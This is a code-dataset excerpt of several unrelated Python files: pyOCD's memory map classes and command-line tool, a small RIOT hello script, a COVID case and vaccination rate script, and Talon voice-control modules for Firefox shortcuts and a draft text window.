main(args) except KeyboardInterrupt: print("Exiting") sys.exit() ```
{ "source": "aabadie/pyOCD", "score": 2 }
#### File: pyocd/core/memory_map.py ```python from enum import Enum import six from functools import total_ordering class MemoryType(Enum): """! @brief Known types of memory.""" OTHER = 0 RAM = 1 ROM = 2 FLASH = 3 DEVICE = 4 EXTERNAL = 5 def check_range(start, end=None, length=None, range=None): assert (start is not None) and ((isinstance(start, MemoryRange) or range is not None) or ((end is not None) ^ (length is not None))) if isinstance(start, MemoryRange): range = start if range is not None: start = range.start end = range.end elif end is None: end = start + length - 1 return start, end ## @brief A range of memory within a region. @total_ordering class MemoryRangeBase(object): def __init__(self, start=0, end=0, length=0, region=None): self._start = start if length != 0: self._end = self._start + length - 1 else: self._end = end self._region = region @property def start(self): return self._start @property def end(self): return self._end @property def length(self): return self._end - self._start + 1 @property def region(self): return self._region def contains_address(self, address): return (address >= self.start) and (address <= self.end) ## # @return Whether the given range is fully contained by the region. def contains_range(self, start, end=None, length=None, range=None): start, end = check_range(start, end, length, range) return self.contains_address(start) and self.contains_address(end) ## # @return Whether the region is fully within the bounds of the given range. def contained_by_range(self, start, end=None, length=None, range=None): start, end = check_range(start, end, length, range) return start <= self.start and end >= self.end ## # @return Whether the region and the given range intersect at any point. def intersects_range(self, start, end=None, length=None, range=None): start, end = check_range(start, end, length, range) return (start <= self.start and end >= self.start) or (start <= self.end and end >= self.end) \ or (start >= self.start and end <= self.end) def __hash__(self): h = hash("%08x%08x%08x" % (self.start, self.end, self.length)) if self.region is not None: h ^= hash(self.region) return h def __eq__(self, other): return self.start == other.start and self.length == other.length def __lt__(self, other): return self.start < other.start or (self.start == other.start and self.length == other.length) ## @brief A range of memory within a region. class MemoryRange(MemoryRangeBase): def __init__(self, start=0, end=0, length=0, region=None): super(MemoryRange, self).__init__(start=start, end=end, length=length) self._region = region @property def region(self): return self._region def __repr__(self): return "<%s@0x%x start=0x%x end=0x%x length=0x%x region=%s>" % (self.__class__.__name__, id(self), self.start, self.end, self.length, self.region) ## @brief One contiguous range of memory. class MemoryRegion(MemoryRangeBase): DEFAULT_ATTRS = { 'name': lambda r: r.attributes.get('name', r.type.name.lower()), 'access': 'rwx', 'alias': None, 'blocksize': 0, 'is_boot_memory': False, 'is_powered_on_boot': True, 'is_cacheable': True, 'invalidate_cache_on_run': True, 'is_testable': True, 'is_ram': lambda r: r.type == MemoryType.RAM, 'is_rom': lambda r: r.type == MemoryType.ROM, 'is_flash': lambda r: r.type == MemoryType.FLASH, 'is_device': lambda r: r.type == MemoryType.DEVICE, 'is_external': lambda r: r.type == MemoryType.EXTERNAL, } def __init__(self, type=MemoryType.OTHER, start=0, end=0, length=0, **attrs): """! Memory region constructor. Optional region attributes passed as keyword arguments: - name: If a name is not provided, the name is set to the region type in lowercase. - access: composition of r, w, x, s - alias - blocksize - is_boot_memory - is_powered_on_boot - is_cacheable - invalidate_cache_on_run - is_testable """ super(MemoryRegion, self).__init__(start=start, end=end, length=length) assert isinstance(type, MemoryType) self._map = None self._type = type self._attributes = attrs # Assign default values to any attributes missing from kw args. for k, v in self.DEFAULT_ATTRS.items(): if k not in self._attributes: if callable(v): v = v(self) self._attributes[k] = v @property def map(self): return self._map @map.setter def map(self, theMap): self._map = theMap @property def type(self): return self._type @property def attributes(self): return self._attributes @property def alias(self): # Resolve alias reference. aliasValue = self._attributes['alias'] if isinstance(aliasValue, six.string_types): referent = self._map.get_region_by_name(aliasValue) if referent is None: raise ValueError("unable to resolve memory region alias reference '%s'" % aliasValue) self._attributes['alias'] = referent return referent else: return aliasValue @property def is_readable(self): return 'r' in self.access @property def is_writable(self): return 'w' in self.access @property def is_executable(self): return 'x' in self.access @property def is_secure(self): return 's' in self.access def __getattr__(self, name): return self._attributes[name] def __repr__(self): return "<%s@0x%x name=%s type=%s start=0x%x end=0x%x length=0x%x blocksize=0x%x>" % (self.__class__.__name__, id(self), self.name, self.type, self.start, self.end, self.length, self.blocksize) ## @brief Contiguous region of RAM. class RamRegion(MemoryRegion): def __init__(self, start=0, end=0, length=0, **attrs): super(RamRegion, self).__init__(type=MemoryType.RAM, start=start, end=end, length=length, **attrs) ## @brief Contiguous region of ROM. class RomRegion(MemoryRegion): def __init__(self, start=0, end=0, length=0, **attrs): attrs['access'] = attrs.get('access', 'rx') super(RomRegion, self).__init__(type=MemoryType.ROM, start=start, end=end, length=length, **attrs) ## @brief Contiguous region of flash memory. class FlashRegion(MemoryRegion): def __init__(self, start=0, end=0, length=0, **attrs): # Import locally to prevent import loops. from ..flash.flash import Flash attrs['access'] = attrs.get('access', 'rx') # By default flash is not writable. super(FlashRegion, self).__init__(type=MemoryType.FLASH, start=start, end=end, length=length, **attrs) self._algo = attrs.get('algo', None) self._flash = None if 'flash_class' in attrs: self._flash_class = attrs['flash_class'] assert issubclass(self._flash_class, Flash) else: self._flash_class = Flash @property def flash_algo(self): return self._algo @property def flash_class(self): return self._flash_class @property def flash(self): return self._flash @flash.setter def flash(self, flashInstance): self._flash = flashInstance ## @brief Contiguous region of external memory. class ExternalRegion(MemoryRegion): def __init__(self, start=0, end=0, length=0, **attrs): attrs['is_testable'] = False super(ExternalRegion, self).__init__(type=MemoryType.EXTERNAL, start=start, end=end, length=length, **attrs) ## @brief Device or peripheral memory. class DeviceRegion(MemoryRegion): def __init__(self, start=0, end=0, length=0, **attrs): attrs['access'] = attrs.get('access', 'rw') # By default flash is not executable. attrs['is_cacheable'] = False attrs['is_testable'] = False super(DeviceRegion, self).__init__(type=MemoryType.DEVICE, start=start, end=end, length=length, **attrs) ## @brief Memory map consisting of memory regions. class MemoryMap(object): def __init__(self, *moreRegions): self._regions = [] self.add_regions(*moreRegions) @property def regions(self): return self._regions @property def region_count(self): return len(self._regions) def add_regions(self, *moreRegions): if len(moreRegions): if isinstance(moreRegions[0], (list, tuple)): regionsToAdd = moreRegions[0] else: regionsToAdd = moreRegions for newRegion in regionsToAdd: self.add_region(newRegion) def add_region(self, newRegion): newRegion.map = self self._regions.append(newRegion) self._regions.sort() def get_boot_memory(self): for r in self._regions: if r.is_boot_memory: return r return None def get_region_for_address(self, address): for r in self._regions: if r.contains_address(address): return r return None def get_region_by_name(self, name): for r in self._regions: if r.name == name: return r return None def is_valid_address(self, address): return self.get_region_for_address(address) is not None def get_contained_regions(self, start, end=None, length=None, range=None): start, end = check_range(start, end, length, range) return [r for r in self._regions if r.contained_by_range(start, end)] def get_intersecting_regions(self, start, end=None, length=None, range=None): start, end = check_range(start, end, length, range) return [r for r in self._regions if r.intersects_range(start, end)] def get_regions_of_type(self, type): for r in self._regions: if r.type == type: yield r def get_first_region_of_type(self, type): for r in self.get_regions_of_type(type): return r return None ## @brief Enable iteration over the memory map. def __iter__(self): return iter(self._regions) def __repr__(self): return "<MemoryMap@0x%08x regions=%s>" % (id(self), repr(self._regions)) ``` #### File: pyOCD/pyocd/__main__.py ```python from __future__ import print_function import sys import logging import traceback import argparse import json import colorama from . import __version__ from .core.helpers import ConnectHelper from .target import TARGET from .gdbserver import GDBServer from .utility.cmdline import ( split_command_line, VECTOR_CATCH_CHAR_MAP, convert_vector_catch, convert_session_options ) from .probe.pydapaccess import DAPAccess from .tools.lists import ListGenerator from .tools.pyocd import PyOCDCommander from .flash import loader from .core import options from .utility.cmdline import split_command_line ## @brief List of built-in targets, sorted by name. SUPPORTED_TARGETS = sorted(list(TARGET.keys())) ## @brief Default log format for all subcommands. LOG_FORMAT = "%(relativeCreated)07d:%(levelname)s:%(module)s:%(message)s" ## @brief Logger for this module. LOG = logging.getLogger("pyocd.tool") ## @brief Default log levels for each of the subcommands. DEFAULT_CMD_LOG_LEVEL = { 'list': logging.INFO, 'json': logging.FATAL + 1, 'flash': logging.WARNING, 'erase': logging.WARNING, 'gdbserver': logging.INFO, 'gdb': logging.INFO, 'commander': logging.WARNING, 'cmd': logging.WARNING, } ## @brief map to convert erase mode to chip_erase option for gdbserver. ERASE_OPTIONS = { 'auto': None, 'chip': True, 'sector': False, } class InvalidArgumentError(RuntimeError): """! @brief Exception class raised for invalid target names.""" pass def validate_target(value): """! @brief Argparse type function to validate the supplied target device name. If the target name is valid, it is returned unmodified to become the --target option's attribute value. """ if value.lower() not in TARGET: raise InvalidArgumentError("invalid target option '{}'".format(value)) return value def convert_frequency(value): """! @brief Applies scale suffix to frequency value string.""" value = value.strip() suffix = value[-1].lower() if suffix in ('k', 'm'): value = int(value[:-1]) if suffix == 'k': value *= 1000 elif suffix == 'm': value *= 1000000 return value else: return int(value) def flatten_args(args): """! @brief Converts a list of lists to a single list.""" return [item for sublist in args for item in sublist] def int_base_0(x): return int(x, base=0) class PyOCDTool(object): """! @brief Main class for the pyocd tool and subcommands. """ def __init__(self): self._args = None self._log_level_delta = 0 self._parser = None self.echo_msg = None self._commands = { 'list': self.do_list, 'json': self.do_json, 'flash': self.do_flash, 'erase': self.do_erase, 'gdbserver': self.do_gdbserver, 'gdb': self.do_gdbserver, 'commander': self.do_commander, 'cmd': self.do_commander, } def build_parser(self): # Create top level argument parser. parser = argparse.ArgumentParser( description='PyOCD debug tools for Arm Cortex devices') subparsers = parser.add_subparsers(title="subcommands", metavar="", dest='cmd') parser.add_argument('-V', '--version', action='version', version=__version__) parser.add_argument('--help-options', action='store_true', help="Display available session options.") # Define common options for all subcommands, excluding --verbose and --quiet. commonOptionsNoLogging = argparse.ArgumentParser(description='common', add_help=False) commonOptionsNoLogging.add_argument('--config', metavar="PATH", help="Specify YAML configuration file. Default is pyocd.yaml or pyocd.yml.") commonOptionsNoLogging.add_argument("--no-config", action="store_true", help="Do not use a configuration file.") commonOptionsNoLogging.add_argument('-O', action='append', dest='options', metavar="OPTION=VALUE", help="Set named option.") commonOptionsNoLogging.add_argument("-da", "--daparg", dest="daparg", nargs='+', help="Send setting to DAPAccess layer.") # Define common options for all subcommands with --verbose and --quiet. commonOptions = argparse.ArgumentParser(description='common', parents=[commonOptionsNoLogging], add_help=False) commonOptions.add_argument('-v', '--verbose', action='count', default=0, help="More logging. Can be specified multiple times.") commonOptions.add_argument('-q', '--quiet', action='count', default=0, help="Less logging. Can be specified multiple times.") # Common connection related options. connectOptions = argparse.ArgumentParser(description='common', add_help=False) connectOptions.add_argument("-u", "--uid", dest="unique_id", help="Choose a probe by its unique ID or a substring thereof.") connectOptions.add_argument("-b", "--board", dest="board_override", metavar="BOARD", help="Set the board type (not yet implemented).") connectOptions.add_argument("-t", "--target", dest="target_override", metavar="TARGET", type=validate_target, help="Set the target type.") connectOptions.add_argument("-f", "--frequency", dest="frequency", default=1000000, type=convert_frequency, help="SWD/JTAG clock frequency in Hz, with optional k/K or m/M suffix for kHz or MHz.") connectOptions.add_argument("-W", "--no-wait", action="store_true", help="Do not wait for a probe to be connected if none are available.") # Create *commander* subcommand parser. commandOptions = argparse.ArgumentParser(description='command', add_help=False) commandOptions.add_argument("-H", "--halt", action="store_true", help="Halt core upon connect.") commandOptions.add_argument("-N", "--no-init", action="store_true", help="Do not init debug system.") commandOptions.add_argument("--elf", metavar="PATH", help="Optionally specify ELF file being debugged.") commandOptions.add_argument("-c", "--command", dest="commands", metavar="CMD", action='append', nargs='+', help="Run commands.") subparsers.add_parser('commander', parents=[commonOptions, connectOptions, commandOptions], help="Interactive command console.") subparsers.add_parser('cmd', parents=[commonOptions, connectOptions, commandOptions], help="Alias for 'commander'.") # Create *erase* subcommand parser. eraseParser = subparsers.add_parser('erase', parents=[commonOptions, connectOptions], help="Erase entire device flash or specified sectors.", epilog="If no position arguments are listed, then no action will be taken unless the --chip or " "--mass-erase options are provided. Otherwise, the positional arguments should be the addresses of flash " "sectors or address ranges. The end address of a range is exclusive, meaning that it will not be " "erased. Thus, you should specify the address of the sector after the last one " "to be erased. If a '+' is used instead of '-' in a range, this indicates that the " "second value is a length rather than end address. " "Examples: 0x1000 (erase single sector starting at 0x1000) " "0x800-0x2000 (erase sectors starting at 0x800 up to but not including 0x2000) " "0+8192 (erase 8 kB starting at address 0)") eraseParser.add_argument("-c", "--chip", dest="erase_mode", action="store_const", const=loader.FlashEraser.Mode.CHIP, help="Perform a chip erase.") eraseParser.add_argument("-s", "--sector", dest="erase_mode", action="store_const", const=loader.FlashEraser.Mode.SECTOR, help="Erase the sectors listed as positional arguments.") eraseParser.add_argument("--mass-erase", dest="erase_mode", action="store_const", const=loader.FlashEraser.Mode.MASS, help="Perform a mass erase. On some devices this is different than a chip erase.") eraseParser.add_argument("addresses", metavar="<sector-address>", action='append', nargs='*', help="List of sector addresses or ranges to erase.") # Create *flash* subcommand parser. flashParser = subparsers.add_parser('flash', parents=[commonOptions, connectOptions], help="Program an image to device flash.") flashParser.add_argument("-e", "--erase", choices=ERASE_OPTIONS.keys(), default='auto', help="Choose flash erase method. Default is auto.") flashParser.add_argument("-a", "--base-address", metavar="ADDR", type=int_base_0, help="Base address used for the address where to flash a binary. Defaults to start of flash.") flashParser.add_argument("--trust-crc", action="store_true", help="Use only the CRC of each page to determine if it already has the same data.") flashParser.add_argument("--format", choices=("bin", "hex", "elf"), help="File format. Default is to use the file's extension.") flashParser.add_argument("--skip", metavar="BYTES", default=0, type=int_base_0, help="Skip programming the first N bytes. This can only be used with binary files.") flashParser.add_argument("file", metavar="PATH", help="File to program into flash.") # Create *gdbserver* subcommand parser. gdbserverOptions = argparse.ArgumentParser(description='gdbserver', add_help=False) gdbserverOptions.add_argument("-p", "--port", dest="port_number", type=int, default=3333, help="Set the port number that GDB server will open (default 3333).") gdbserverOptions.add_argument("-T", "--telnet-port", dest="telnet_port", type=int, default=4444, help="Specify the telnet port for semihosting (default 4444).") gdbserverOptions.add_argument("--allow-remote", dest="serve_local_only", default=True, action="store_false", help="Allow remote TCP/IP connections (default is no).") gdbserverOptions.add_argument("--persist", dest="persist", default=False, action="store_true", help="Keep GDB server running even after remote has detached.") gdbserverOptions.add_argument("--elf", metavar="PATH", help="Optionally specify ELF file being debugged.") gdbserverOptions.add_argument("-e", "--erase", choices=('auto', 'chip', 'sector'), default='auto', help="Choose flash erase method. Default is auto.") gdbserverOptions.add_argument("--trust-crc", action="store_true", help="Use only the CRC of each page to determine if it already has the same data.") gdbserverOptions.add_argument("-C", "--vector-catch", default='h', help="Enable vector catch sources, one letter per enabled source in any order, or 'all' " "or 'none'. (h=hard fault, b=bus fault, m=mem fault, i=irq err, s=state err, " "c=check err, p=nocp, r=reset, a=all, n=none). Default is hard fault.") gdbserverOptions.add_argument("-S", "--semihosting", dest="enable_semihosting", action="store_true", help="Enable semihosting.") gdbserverOptions.add_argument("--step-into-interrupts", dest="step_into_interrupt", default=False, action="store_true", help="Allow single stepping to step into interrupts.") gdbserverOptions.add_argument("-c", "--command", dest="commands", metavar="CMD", action='append', nargs='+', help="Run command (OpenOCD compatibility).") subparsers.add_parser('gdbserver', parents=[commonOptions, connectOptions, gdbserverOptions], help="Run the gdb remote server(s).") subparsers.add_parser('gdb', parents=[commonOptions, connectOptions, gdbserverOptions], help="Alias for 'gdbserver'.") # Create *json* subcommand parser. # # The json subcommand does not support --verbose or --quiet since all logging is disabled. jsonParser = subparsers.add_parser('json', parents=[commonOptionsNoLogging], help="Output information as JSON.") group = jsonParser.add_mutually_exclusive_group() group.add_argument('-p', '--probes', action='store_true', help="List available probes.") group.add_argument('-t', '--targets', action='store_true', help="List all known targets.") group.add_argument('-b', '--boards', action='store_true', help="List all known boards.") jsonParser.set_defaults(verbose=0, quiet=0) # Create *list* subcommand parser. listParser = subparsers.add_parser('list', parents=[commonOptions], help="List information about probes, targets, or boards.") group = listParser.add_mutually_exclusive_group() group.add_argument('-p', '--probes', action='store_true', help="List available probes.") group.add_argument('-t', '--targets', action='store_true', help="List all known targets.") group.add_argument('-b', '--boards', action='store_true', help="List all known boards.") self._parser = parser return parser def _setup_logging(self, defaultLogLevel): self._log_level_delta = (self._args.quiet * 10) - (self._args.verbose * 10) level = max(1, defaultLogLevel + self._log_level_delta) logging.basicConfig(level=level, format=LOG_FORMAT) def _increase_logging(self, loggers): if self._log_level_delta <= 0: for logger in loggers: logging.getLogger(logger).setLevel(logging.INFO) def run(self, args=None): try: self._args = self.build_parser().parse_args(args) # Running without a subcommand will print usage. if self._args.cmd is None: if self._args.help_options: self.show_options_help() else: self._parser.print_help() return 1 # The default log level differs for some subcommands. defaultLogLevel = DEFAULT_CMD_LOG_LEVEL[self._args.cmd] self._setup_logging(defaultLogLevel) # Pass any options to DAPAccess. DAPAccess.set_args(self._args.daparg) # Invoke subcommand. self._commands[self._args.cmd]() # Successful exit. return 0 except InvalidArgumentError as e: self._parser.error(e) return 1 except KeyboardInterrupt: return 0 except Exception as e: LOG.error("uncaught exception: %s", e, exc_info=True) return 1 def show_options_help(self): for infoName in sorted(options.OPTIONS_INFO.keys()): info = options.OPTIONS_INFO[infoName] print((colorama.Fore.BLUE + "{name}" + colorama.Style.RESET_ALL + colorama.Fore.GREEN + " ({typename})" + colorama.Style.RESET_ALL + " {help}").format( name=info.name, typename=info.type.__name__, help=info.help)) def do_list(self): # Default to listing probes. if (self._args.probes, self._args.targets, self._args.boards) == (False, False, False): self._args.probes = True if self._args.probes: ConnectHelper.list_connected_probes() elif self._args.targets: obj = ListGenerator.list_targets() for info in obj['targets']: print("{name}\t{part_number}".format(**info)) elif self._args.boards: obj = ListGenerator.list_boards() for info in obj['boards']: print("{id}\t{name}\t{target}\t{binary}".format(**info)) def do_json(self): # Default to listing probes. if (self._args.probes, self._args.targets, self._args.boards) == (False, False, False): self._args.probes = True if self._args.probes: obj = ListGenerator.list_probes() print(json.dumps(obj, indent=4)) elif self._args.targets: obj = ListGenerator.list_targets() print(json.dumps(obj, indent=4)) elif self._args.boards: obj = ListGenerator.list_boards() print(json.dumps(obj, indent=4)) def do_flash(self): self._increase_logging(["pyocd.tools.loader", "pyocd", "flash", "flash_builder"]) session = ConnectHelper.session_with_chosen_probe( config_file=self._args.config, no_config=self._args.no_config, unique_id=self._args.unique_id, target_override=self._args.target_override, frequency=self._args.frequency, blocking=False, **convert_session_options(self._args.options)) if session is None: sys.exit(1) with session: programmer = loader.FileProgrammer(session, chip_erase=ERASE_OPTIONS[self._args.erase], trust_crc=self._args.trust_crc) programmer.program(self._args.file, base_address=self._args.base_address, skip=self._args.skip, format=self._args.format) def do_erase(self): self._increase_logging(["pyocd.tools.loader", "pyocd"]) session = ConnectHelper.session_with_chosen_probe( config_file=self._args.config, no_config=self._args.no_config, unique_id=self._args.unique_id, target_override=self._args.target_override, frequency=self._args.frequency, blocking=False, **convert_session_options(self._args.options)) if session is None: sys.exit(1) with session: mode = self._args.erase_mode or loader.FlashEraser.Mode.SECTOR eraser = loader.FlashEraser(session, mode) addresses = flatten_args(self._args.addresses) eraser.erase(addresses) ## @brief Handle OpenOCD commands for compatibility. def _process_commands(self, commands): if commands is None: return for cmd_list in commands: try: cmd_list = split_command_line(cmd_list) cmd = cmd_list[0] if cmd == 'gdb_port': if len(cmd_list) < 2: LOG.error("Missing port argument") else: self._args.port_number = int(cmd_list[1], base=0) elif cmd == 'telnet_port': if len(cmd_list) < 2: LOG.error("Missing port argument") else: self._args.telnet_port = int(cmd_list[1], base=0) elif cmd == 'echo': self.echo_msg = ' '.join(cmd_list[1:]) else: LOG.error("Unsupported command: %s" % ' '.join(cmd_list)) except IndexError: pass def server_listening(self, server): if self.echo_msg is not None: print(self.echo_msg, file=sys.stderr) sys.stderr.flush() def do_gdbserver(self): self._process_commands(self._args.commands) gdbs = [] try: # Build dict of session options. sessionOptions = convert_session_options(self._args.options) sessionOptions.update({ 'gdbserver_port' : self._args.port_number, 'telnet_port' : self._args.telnet_port, 'persist' : self._args.persist, 'step_into_interrupt' : self._args.step_into_interrupt, 'chip_erase': ERASE_OPTIONS[self._args.erase], 'fast_program' : self._args.trust_crc, 'enable_semihosting' : self._args.enable_semihosting, 'serve_local_only' : self._args.serve_local_only, 'vector_catch' : self._args.vector_catch, }) session = ConnectHelper.session_with_chosen_probe( blocking=(not self._args.no_wait), config_file=self._args.config, no_config=self._args.no_config, unique_id=self._args.unique_id, target_override=self._args.target_override, frequency=self._args.frequency, **sessionOptions) if session is None: LOG.error("No probe selected.") return with session: # Set ELF if provided. if self._args.elf: session.board.target.elf = self._args.elf for core_number, core in session.board.target.cores.items(): gdb = GDBServer(session, core=core_number, server_listening_callback=self.server_listening) gdbs.append(gdb) gdb = gdbs[0] while gdb.isAlive(): gdb.join(timeout=0.5) except Exception as e: for gdb in gdbs: gdb.stop() raise def do_commander(self): # Flatten commands list then extract primary command and its arguments. if self._args.commands is not None: cmds = [] for cmd in self._args.commands: cmds.append(flatten_args(split_command_line(arg) for arg in cmd)) else: cmds = None # Enter REPL. PyOCDCommander(self._args, cmds).run() def main(): sys.exit(PyOCDTool().run()) if __name__ == '__main__': main() ```
{ "source": "aabadie/riotctrl", "score": 3 }
#### File: utils/application/hello.py ```python import sys import signal def main(): """Print some header and do nothing.""" print('Starting RIOT Ctrl') print('Hello World') while True: signal.pause() if __name__ == '__main__': sys.exit(main()) ```
{ "source": "aabaker/covid-data", "score": 3 }
#### File: aabaker/covid-data/world-rates.py ```python import codecs import csv import datetime from contextlib import closing import requests url = 'https://covid.ourworldindata.org/data/owid-covid-data.csv' cont_col = 1 name_col = 2 date_col = 3 newc_col = 5 vacc_col = 34 popn_col = 44 jan1 = datetime.date(2020, 1, 1) class Country: def __init__(self, name, population): self.population = population self.name = name self.vaccinations = 0 self.cases = [] self.vaccinationDate = 0 def addCases(self, daynum, num, vaccinations): while (len(self.cases) <= daynum): self.cases.append(0) if vaccinations > self.vaccinations: self.vaccinations = vaccinations self.vaccinationDate = daynum self.cases[daynum] = num def totalCases(self): return sum(self.cases) def days(self): return len(self.cases) def rateOverInterval(self, end, days): return sum(self.cases[end - days + 1:end + 1]) / self.population * 100000 def format(self, day): result = self.name result += ', This Week: ' result += f'{self.rateOverInterval(day, 7):.2f}' result += ', Last Week: ' result += f'{self.rateOverInterval(day - 7, 7):.2f}' result += ', Total: ' result += f'{self.rateOverInterval(day, day):.2f}' result += ', Population: ' result += f'{self.population:.0f}' result += ', Ref Day: ' result += str(jan1 + datetime.timedelta(day)) return result countries = {} latestDay = 0 with closing(requests.get(url, stream=True)) as r: reader = csv.reader(codecs.iterdecode(r.iter_lines(), 'utf-8')) head = next(reader) # skip header for row in reader: country = row[name_col] if row[cont_col] == "": continue if not country in countries: try: countries[country] = Country(country, float(row[popn_col])) except: print(country) row_date = datetime.datetime.strptime(row[date_col], '%Y-%m-%d').date() if row[vacc_col] == "": vaccinations = 0.0 else: vaccinations = float(row[vacc_col]) if row_date >= jan1: if (row_date - jan1).days > latestDay: latestDay = (row_date - jan1).days cases = row[newc_col] if cases == '': cases = 0 else: cases = int(float(cases)) if cases != 0: countries[country].addCases((row_date - jan1).days, cases, vaccinations) print("Infection rates") sortedCountries = sorted(countries, key=lambda place: countries[place].rateOverInterval(countries[place].days() - 1,7), reverse=True) index = 0 printed = 0 while printed < 15: place = sortedCountries[index] if countries[place].days() > latestDay - 7: printed += 1 print(countries[place].format(countries[place].days() - 1)) index += 1 print() print(countries["United Kingdom"].format(countries[place].days() - 1)) print(countries["France"].format(countries[place].days() - 1)) print(countries["Italy"].format(countries[place].days() - 1)) print(countries["Germany"].format(countries[place].days() - 1)) print() print("Vaccination rates") sortedCountries = sorted(countries, key=lambda place: countries[place].vaccinations / countries[place].population, reverse=True) for place in sortedCountries[:15]: print(countries[place].name + " percent vaccinated: " + f'{countries[place].vaccinations / countries[place].population * 100.0 :.2f}' + " total vaccinations: " + str (countries[place].vaccinations) + ' as of : ' + str(jan1 + datetime.timedelta(countries[place].vaccinationDate))) ```
{ "source": "aabarug/knausj_talon", "score": 3 }
#### File: apps/firefox/mac.py ```python from talon import Context, actions ctx = Context() ctx.matches = r""" os: mac app: firefox """ @ctx.action_class('browser') class BrowserActions: def bookmark(): actions.key('cmd-d') def bookmark_tabs(): actions.key('cmd-shift-d') def bookmarks(): actions.key('cmd-alt-b') #action(browser.bookmarks_bar): # key(ctrl-shift-b) def focus_address(): actions.key('cmd-l') #action(browser.focus_page): def go_blank(): actions.key('cmd-n') def go_back(): actions.key('cmd-left') def go_forward(): actions.key('cmd-right') def go_home(): actions.key('cmd-shift-h') def open_private_window(): actions.key('cmd-shift-p') def reload(): actions.key('cmd-r') def reload_hard(): actions.key('cmd-shift-r') #action(browser.reload_hardest): def show_clear_cache(): actions.key('cmd-shift-delete') def show_downloads(): actions.key('cmd-shift-j') def show_extensions(): actions.key('cmd-shift-a') def show_history(): actions.key('cmd-y') def toggle_dev_tools(): actions.key('cmd-alt-i') @ctx.action_class("user") class UserActions: def tab_jump(number: int): if number < 9: actions.key("cmd-{}".format(number)) def tab_final(): actions.key("cmd-9") ``` #### File: knausj_talon/talon_draft_window/draft_ui.py ```python from typing import Optional import re from talon.experimental.textarea import ( TextArea, Span, DarkThemeLabels, LightThemeLabels ) word_matcher = re.compile(r"([^\s]+)(\s*)") def calculate_text_anchors(text, cursor_position, anchor_labels=None): """ Produces an iterator of (anchor, start_word_index, end_word_index, last_space_index) tuples from the given text. Each tuple indicates a particular point you may want to reference when editing along with some useful ranges you may want to operate on. - text is the text you want to process. - cursor_position is the current position of the cursor, anchors will be placed around this. - anchor_labels is a list of characters you want to use for your labels. - *index is just a character offset from the start of the string (e.g. the first character is at index 0) - end_word_index is the index of the character after the last one included in the anchor. That is, you can use it with a slice directly like [start:end] - anchor is a short piece of text you can use to identify it (e.g. 'a', or '1'). """ anchor_labels = anchor_labels or "abcdefghijklmnopqrstuvwxyz" if len(text) == 0: return [] # Find all the word spans matches = [] cursor_idx = None for match in word_matcher.finditer(text): matches.append(( match.start(), match.end() - len(match.group(2)), match.end() )) if matches[-1][0] <= cursor_position and matches[-1][2] >= cursor_position: cursor_idx = len(matches) - 1 # Now work out what range of those matches are getting an anchor. The aim is # to centre the anchors around the cursor position, but also to use all the # anchors. anchors_before_cursor = len(anchor_labels) // 2 anchor_start_idx = max(0, cursor_idx - anchors_before_cursor) anchor_end_idx = min(len(matches), anchor_start_idx + len(anchor_labels)) anchor_start_idx = max(0, anchor_end_idx - len(anchor_labels)) # Now add anchors to the selected matches for i, anchor in zip(range(anchor_start_idx, anchor_end_idx), anchor_labels): word_start, word_end, whitespace_end = matches[i] yield ( anchor, word_start, word_end, whitespace_end ) class DraftManager: """ API to the draft window """ def __init__(self): self.area = TextArea() self.area.title = "Talon Draft" self.area.value = "" self.area.register("label", self._update_labels) self.set_styling() def set_styling( self, theme="dark", text_size=20, label_size=20, label_color=None ): """ Allow settings the style of the draft window. Will dynamically update the style based on the passed in parameters. """ area_theme = DarkThemeLabels if theme == "dark" else LightThemeLabels theme_changes = { "text_size": text_size, "label_size": label_size, } if label_color is not None: theme_changes["label"] = label_color self.area.theme = area_theme(**theme_changes) def show(self, text: Optional[str] = None): """ Show the window. If text is None then keep the old contents, otherwise set the text to the given value. """ if text is not None: self.area.value = text self.area.show() def hide(self): """ Hide the window. """ self.area.hide() def get_text(self) -> str: """ Gets the context of the text area """ return self.area.value def get_rect(self) -> "talon.types.Rect": """ Get the Rect for the window """ return self.area.rect def reposition( self, xpos: Optional[int] = None, ypos: Optional[int] = None, width: Optional[int] = None, height: Optional[int] = None, ): """ Move the window or resize it without having to change all properties. """ rect = self.area.rect if xpos is not None: rect.x = xpos if ypos is not None: rect.y = ypos if width is not None: rect.width = width if height is not None: rect.height = height self.area.rect = rect def select_text( self, start_anchor, end_anchor=None, include_trailing_whitespace=False ): """ Selects the word corresponding to start_anchor. If end_anchor supplied, selects from start_anchor to the end of end_anchor. If include_trailing_whitespace=True then also selects trailing space characters (useful for delete). """ start_index, end_index, last_space_index = self.anchor_to_range(start_anchor) if end_anchor is not None: _, end_index, last_space_index = self.anchor_to_range(end_anchor) if include_trailing_whitespace: end_index = last_space_index self.area.sel = Span(start_index, end_index) def position_caret(self, anchor, after=False): """ Positions the caret before the given anchor. If after=True position it directly after. """ start_index, end_index, _ = self.anchor_to_range(anchor) index = end_index if after else start_index self.area.sel = index def anchor_to_range(self, anchor): anchors_data = calculate_text_anchors(self._get_visible_text(), self.area.sel.left) for loop_anchor, start_index, end_index, last_space_index in anchors_data: if anchor == loop_anchor: return (start_index, end_index, last_space_index) raise RuntimeError(f"Couldn't find anchor {anchor}") def _update_labels(self, _visible_text): """ Updates the position of the labels displayed on top of each word """ anchors_data = calculate_text_anchors(self._get_visible_text(), self.area.sel.left) return [ (Span(start_index, end_index), anchor) for anchor, start_index, end_index, _ in anchors_data ] def _get_visible_text(self): # Placeholder for a future method of getting this return self.area.value if False: # Some code for testing, change above False to True and edit as desired draft_manager = DraftManager() draft_manager.show( "This is a line of text\nand another line of text and some more text so that the line gets so long that it wraps a bit.\nAnd a final sentence" ) draft_manager.reposition(xpos=100, ypos=100) draft_manager.select_text("c") ```
{ "source": "aabayarea/wiser", "score": 3 }
